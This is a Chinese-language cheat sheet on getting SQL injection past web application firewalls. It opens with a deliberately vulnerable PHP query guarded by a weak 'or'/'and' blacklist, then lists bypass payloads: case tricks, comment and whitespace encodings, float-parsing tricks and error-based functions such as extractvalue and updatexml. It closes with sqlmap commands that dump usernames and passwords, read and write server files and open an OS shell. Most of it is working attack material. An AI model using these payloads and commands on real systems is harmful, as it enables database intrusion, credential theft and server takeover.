WAF绕过
原理
掌握mysql函数和语法使用方法+深入了解中间件运行处理机制+了解WAF防护原理及方法=绕过WAF防护
代码实现:
(部分)
$id =$_GET[‘id’];
$id = blacklist($id);
$sql=’select * from users where id=’$id’ limit 0,1”;
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
function blacklist($id)
{
$id = preg_replace(‘/or/i’,’’,$id);
$id = preg_replace(‘/AND/i’,’’,$id);
return $id;
}
1.分析代码:
使用了Blacklist函数过滤了’or’和’and’
2.绕过限制
大小写变形:Or OR,oR 等价替换:and = & or = || 双写等
黑盒绕过:
- 架构层绕过:
- 寻找源站,针对云WAF
- 利用同网段,绕过WAF防护区域
- 利用边界漏洞,绕过WAF防护区
2.资源限制角度绕过WAF
post大body
3.协议层面绕WAF
- 协议未覆盖WAF
(请求方式变化:get>post 参数污染)
4.规则层面绕过
- sql注释符绕过
- union /**/select
- union/aaa%01bbs/select
- union/aaaaaaaaaaaaaaaaaaaaaa/select
- 内联注释:/!xxx/
2.空白符绕过
- mysql空白符:%09.%0A.%0B.%0D.%0C.%A0.%20,/xxx/
- 正则的空白符:%09.%0A.%0B.%0D.%20
exa1:union%250Cselect
exa2:union%25A0select
3.函数分割符号:
- concat%2520(
- concat/**/(
- concat%250c(
- concat%25a0(
4.浮点数词法解析
select * from users where id = 8E0union select 1,2,3,4,5,6,7,8,0
select * from users where id = 8.0 union select 1,2,3,4,5,6,7,8,0
select * from users where id =\N union select 1,2,3,4,5,6,7,8,9,0
5.利用error-base进行sql注入:error-based sql注入函数非常容易被忽略extractvalue(1,concat(0x5c,md5(3)));
updatexml(1,concat(0x5d,md5(3)),1);
GeometryCollection((select * from(select * from(select@@version)f)x))
polygon((select * from (select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
6.mysql特殊语法
- select{x table_name}from{x information_schema.tables};
以注释符绕过为例,采取工具BP进行fuzz注释符内的字符获取payload
sqlmap常见命令
sqlmap.py -u ‘url?id=1’
sqlmap.py -u ‘url?id=1’ – current-db
sqlmap.py -u ‘url?id=1’ –current-user
sqlmap.py -u ‘url?id=1’ -D security –tables
sqlmap.py -u ‘url?id=1’ -D security -T users –columns
sqlmap.py -u ‘url?id=1’ -D security -T users -C username,password –dump
sqlmap.py -u ‘url?id=1’ –os-shell
sqlmap.py -u ‘url?id=1’ –sql-shell
sqlmap.py -u ‘url?id=1’ –file-read
sqlmap.py -u ‘url?id=1’ –file-write 本地文件 –file-dest 目标目录及文件